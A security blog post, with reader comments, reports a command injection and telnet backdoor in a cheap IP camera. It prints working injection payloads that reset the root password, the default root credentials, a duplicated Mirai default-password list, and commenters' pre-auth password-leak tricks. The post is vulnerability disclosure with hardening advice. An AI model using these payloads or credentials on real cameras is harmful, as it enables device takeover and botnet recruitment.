The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.
Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.
The obvious problems
I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.
It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course.
Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"
This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.
Let's run a quick nmap on this device.
PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 81/tcp open http GoAhead-Webs httpd | http-auth: | HTTP/1.1 401 Unauthorized |_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open tcpwrapped
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.
The double-blind command injection
The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)or cleaning up after URL decode:
$(ping -c 2 `pwd`)but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b) ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`) ;leak it via DNSAfter I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...
I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.
But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)Now, logging in via telnet
(none) login: root Password: BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #Woot woot :) I quickly noticed the root of the command injection problem:
# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye
Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password.
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.
It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.
Last but not least everything is running as root, which is not surprising.
My hardening list
I added these lines to the end of /system/init/ipcam.sh:
sleep 15 echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.
If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
My TODO list
- Investigate the script /system/system/bin/gmail_thread
- Investigate the cloud protocol * - see update 2016 10 27
- Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump.
And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.
When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.
If you are interested in generic ways to protect your home against IoT, read my previous blog post on this.
Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html
Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
root (none)
admin password
root root
root 12345
user user
admin (none)
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
root (none)
admin password
root root
root 12345
user user
admin (none)
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included.
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE),
which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled.
http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/
Nice work.
ReplyDeleteI often wonder why they (the developers) pick such rubbish passwords! But then whatever was picked it would be found with a core dump or other exploitable hardware attack...
I often think there's a hardware solution, but then you realise that adding even one dipswitch would up the cost massively! Perhaps a plugboard would give a decent solution. But since an attacker can likely try a thousand plus passwords a second for years without detection, would even that work?
The developers are the cheapest nephew scripter the subcontractor could find. Or perhaps that guy in the dinner across the street who has an I <3 Emacs sticker.
DeleteIs well known that security doesn't sell to 99% of the market. All the big breaches have negligible impact to corporate earnings for giants -- how could Chinese cut rate manufacturers do better?
Anyway, get the raspberry pi camera rather than USB; the control and performance through the camera/GPU interface is well worth it!
Actually, it doesn't need to be as easy as pulling the password out of flash. If they would have used a strong password AND stored it as a secure hash with a actual random salt, then there would at least be a huge barrier to cracking the password.
DeleteCool, I think I've hacked one of these before. If it's the same thing I saw, there was a command injection in del_file.cgi.
ReplyDeleteYes, probably this is the same
DeleteLooks like an EM6220. Which other brands and types might contain the same vuln, interesting... don't think this vendor has developed everything in-house.
ReplyDeleteI can neither confirm nor deny this is an EM6220. But if you google the hash of the password along with IP camera, you can find quite a lot of other vendors are affected.
DeleteThe camera is EMINENT EM6220
Delete1. The picture (obviously)
2. The online manual has precisely 27 pages
This is far from responsible disclosure…
What's the device's name?
ReplyDeleteSimilar findings (for IZON cameras, that is) from a buddy: https://www.youtube.com/watch?v=h_80VguaAI8
ReplyDeleteAwesome, thanks for sharing :)
DeleteThe camera is EMINENT EM6220
Delete1. The picture (obviously)
2. The online manual has precisely 27 pages
This is far from responsible disclosure…
The picture posted is of an Eminent EM6220: http://www.mobile-harddisk.nl/product/4666/eminent-em6220-ecamview-pantilt-ip-camera.html?language=en. While one would simply assume the author used a random photo to showcase a sample IP camera, since the author blurred out the name on the camera that would show that it's the photo of the actual camera. But while this article is on the EM6220 the author also notes it affects other cameras.
ReplyDeleteNice shell injection work. I guess people shouldn't really use shell.
ReplyDeleteI don't like this connection with a 3rd party server business: https://www.youtube.com/watch?v=ppwLHmJx0vc
This is a standard camera board that seems to be reused in multiple different branded cameras with similar firmware. Here's a write up where I got the password from firmware analysis for a camera I got from Aldi: https://www.pentestpartners.com/blog/hacking-the-ip-camera-part-1/
ReplyDeleteNice find on the command injection though, I didn't even think of trying that! I need to dig the Aldi camera out of my box of IoT crap and check whether it's also vulnerable!
And yes, you can cross compile nmap and netcat for it - though you don't have much storage space!
You can also get data back from the command injection: just put it in the user parameter and set up your ftp server to log all login requests :-)
DeleteOkay, will try this for office's camera... :)
ReplyDeleteIoT oh IoT...
ReplyDeleteYour IoT belong to us ;)
ReplyDeleteI brute-forced the telnet a while ago hoping to dig out the decoder_control.cgi and camera_control.cgi but I cannot find them anywhere. I tried to mount the additional mtdblock devices to see if they are in a read only boot rom but they won' load.
ReplyDeleteAnyone else had any luck with this?
Hi.
ReplyDeleteCan i use this camera video for Zoneminder ?
Yep. Found all the passwords from the camera via telnet.
ReplyDeleteHi,
ReplyDeleteI have a "hosafe" nvr and i like root password.
root:$1$y5hskMvE$Pdm4AgjJjNL5Uk08vgH/h0:0:0::/root:/bin/sh
pls help me!
Did anybody analyze the UDP cloud protocol? To get my p2p cam (doorbell) working as i want, i need to decrypt the protocol and build my own "server".
ReplyDeleteHi,
ReplyDeleteIs it possible to block the cloud services from ROUTER?
I don;t like the idea that anyone can have have access to my camera, I prefer to use my camera local or via VPN tunnel.
I'm with "Marie's erster Blog". I'd like to setup my own server for this. I am able to intercept the keep-alives, but need to know the payload to trigger the UDP tunnel. The cloud server that my ip camera came preconfigured with is unreachable, so I can't even do a trial run to see what they are sending back.
ReplyDelete
ReplyDelete# netstat -na
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.88.21:10080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:9600 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:108 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:10554 0.0.0.0:* LISTEN
tcp 0 0 192.168.88.21:23 192.168.88.57:55316 ESTABLISHED
Hi, nice writeup about these IoT nightmares. For update 2017-03-08 pre-auth vuln:
ReplyDeleteI've also found an other interesting pre-auth vuln which makes it possible to get access for the RCE super easily. Just "GET login.cgi" (without the leading "/") and you get the admin password as cleartext. :)
This writeup is a little bit confusing, but contains the disclosure:
https://blogs.securiteam.com/index.php/archives/3043
Hello, congrats it's a nice article, I did the same hack with an Escam camera back in 2015. The only difference was that I asked the Chinese manufacturer for a firmware upgrade. They just sent it so I could look into it, seeing the file system so I extracted the /etc/passwd from that fs. :-D
ReplyDeleteI still have the camera (not connected to my local network) and recently I wondering to make use of it somehow. So it'd be nice to - after revealing the facts how bad are these little cameras - looking for a kind of a solution. Ordinary people think totally insecure like "hey, this food is toxic but it's soooo cheap" :-) If we can't change their mindset then let's propose a proper secure solution for the problem that someone want to see the home garden from an Android phone - just because it's a justifiable demand nowadays. In other words, you showed that using a cheap Chinese cam out of the box is a bad idea, so what's next? Thanks.
check these out
ReplyDeletels /sbin
wifi_unload.sh openl2tpd ddns.sh
wan.sh openl2tp.sh cpubusy.sh
vpn-passthru.sh ntp.sh config.sh
vconfig nat.sh config-vlan.sh
udhcpc.sh mkdosfs config-udhcpd.sh
udhcpc lsmod config-pptp.sh
syslogd logread config-pppoe.sh
sysctl lan.sh config-l2tp.sh
snort.sh klogd config-igmpproxy.sh
snmp.sh internet.sh config-iTunes.sh
route insmod config-dns.sh
rmmod init chpasswd.sh
reboot ifconfig automount.sh
radvd halt autoconn3G.sh
pppoe.sh global.sh accel-pptp.sh
pppoe-relay firewall.sh
poweroff fdisk
It was just after midnight 17th Sept 17 and I was woken by the sound of the camera panning.
ReplyDeleteI logged on to the Yoosee App on my mobile phone device to see it panning around left right ect. I then panned the camera in the opposing direction and it panned back. I then noted it said 2 audiences. I then panned the camera to the ceiling and it was then the audience went to 1.
I immediately went to the camera and disconnected the power supply.
I am the only user of the camera and app. I have passwords on my router and for camera App (different of course)
I'll take your advice....throwing camera in the bin and deleting apps
How did you get out of infinite reboot loop. I've just change language and ask me for reboot, and now is on that loop... no reset button.. no factory reset...
ReplyDeleteLook like the updated some firmwares and the root / 123456 isn't working anymore. I still can request some of the cgi scripts like get_status and get_params.cgi:
ReplyDeletevar alias=""; var deviceid="BRTD-012185-MCYML"; var apilisense="GPYNQM"; var sys_ver="V6.3.22.38(M)"; var appver="V10.1.0.9"; var now=1517568122; var alarm_status=0; var upnp_status=0; var dnsenable=0; var osdenable=0; var syswifi_mode=0; var mac="00:c0:29:01:0b:b1"; var wifimac="00:c0:29:01:0b:b2"; var sdstatus=0; var record_sd_status=0; var dns_status=0; var devicetype=0; var devicesubtype=0; var externwifi=1; var encrypt=0; var under=0; var sdtotal=0; var sdfree=0; var sdlevel=0;
Starting Nmap 7.01 ( https://nmap.org ) at 2018-02-02 11:30 CET
Nmap scan report for 192.168.1.33
Host is up (0.0087s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
23/tcp open telnet
81/tcp open hosts2-ns
Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds
Running Hydra with the rockyou password file but no luck yet :(
Don't know if there is still code injection possibility through one off the .cgi scripts?
Hello, incredible!
ReplyDeleteescam qd500 telnet with root xmhdipc
Thank you!
Anonymous chinese IP Cam, ESCAM like.
DeleteFound telnet on TCP port 8357.
No one of the known password found googling around worked.
I was able to collect /etc/passwd using cgi injection and to feed john-the-ripper.
Found telnet root password: runtop10
Hope it's useful...
Thank you.
Hi,
DeleteCan you send CGI that you have used to collect /etc/passwd. that will help a lot
Awesome article, can anybody confirm that i can setup my own server and acccessing from that will be safer? Tq
ReplyDeleteI read your articles very excellent and the i agree our all points because all is very good information provided this through in the post.
ReplyDelete>even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera
ReplyDeleteNot sure after this sentence - if I am dropping any communication from camera (identified by MAC address) to the Internet, I AM safe, am I not?
I have connected my insecure cameras to an old router, without an internet gateway. My recording PC runs iSpy, keeps archive stream data, and is connected both to my home network (which has internet access), and to my local camera network. It won't forward packets from the insecure camera network to my primary network. I think it should be easy to arrange to port-forward from my cellphone to iSpy if I want to view streams from outside home.
ReplyDeleteSo rather than advise throwing cheap cloud camera in the garbage, put them on their own isolated intranet. (My old router can occasionally be connected to the internet if I need the cloud to initially configure a new camera).
I have suspected for some time now that my camera system has a backdoor being used by an actor in china. With the required military cooperation by businesses in china it would not be a surprise of all camera survaillance systems produced in china are required to have a backdoor for china military use. Imagine the benefit of being able to see your targets populations reaction to a minor (feint) attack on a mid-size city in the NW while you quietly prepare to attack elsewhere.
ReplyDeleteYou could find news accounts, target militaries movements, etc...